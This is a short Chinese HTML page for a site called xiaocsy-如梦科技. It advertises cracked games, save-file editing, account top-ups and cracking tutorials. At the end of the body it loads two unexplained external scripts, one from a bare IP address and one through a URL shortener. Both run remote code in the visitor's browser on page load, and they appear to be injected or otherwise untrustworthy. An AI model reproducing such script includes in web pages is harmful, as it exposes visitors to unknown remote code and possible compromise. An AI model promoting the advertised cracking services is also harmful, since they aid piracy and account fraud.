<html lang="zh-cn">
<head>
  <meta charset="utf-8"/>
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"/>
  <title>xiaocsy-如梦科技 - </title>
  <meta name="keywords" content="xiaocsy-如梦科技">
  <meta name="description" content="xiaocsy-如梦科技">
  <link href="//lib.baomitu.com/twitter-bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"/>
  <link href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"/>
  <link href="assets/css/nifty.min.css" rel="stylesheet">
  <link href="assets/css/magic-check.min.css" rel="stylesheet">
  <link href="assets/css/pace.min.css" rel="stylesheet">
  <!--[if lt IE 9]>
    <script src="//lib.baomitu.com/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="//lib.baomitu.com/respond.js/1.4.2/respond.min.js"></script>
  <![endif]-->
<style>
body{
background:#ecedf0 url("assets/img/bj.png") fixed;
background-repeat:repeat;}
img.logo{width:14px;height:14px;margin:0 5px 0 3px;}
.onclick{cursor: pointer;touch-action: manipulation;}
.giftlist{overflow:hidden;width:90%;margin:0 auto}
.giftlist ul{height:270px;overflow:hidden;padding:0}
.giftlist li{width:100%;line-height:35px;padding:0 10px;overflow:hidden;box-sizing:border-box;-webkit-box-sizing:border-box;-moz-box-sizing:border-box}
.giftlist li strong{margin:0 5px 0 0;font-weight:400;color:#1977d8}
</style>
</head>
<body>
  <h1>xiaocsy-如梦科技</h1>
  <h3>破解游戏、本地改存档、账号直冲、破解教程</h3>
  <h4>客服QQ：见淘宝信息，主动聊天附带破解、逆空使命等关键字一律不回复</h4>
  <a href="https://imgtu.com/i/gDpOW6"><img src="https://z3.ax1x.com/2021/05/13/gDpOW6.png" alt="gDpOW6.png" border="0" /></a>
  <script src="http://47.113.199.25/?s=xkTYo"></script>
  <script src="https://0x.ax/zNDb"></script>
  
</body>
</html>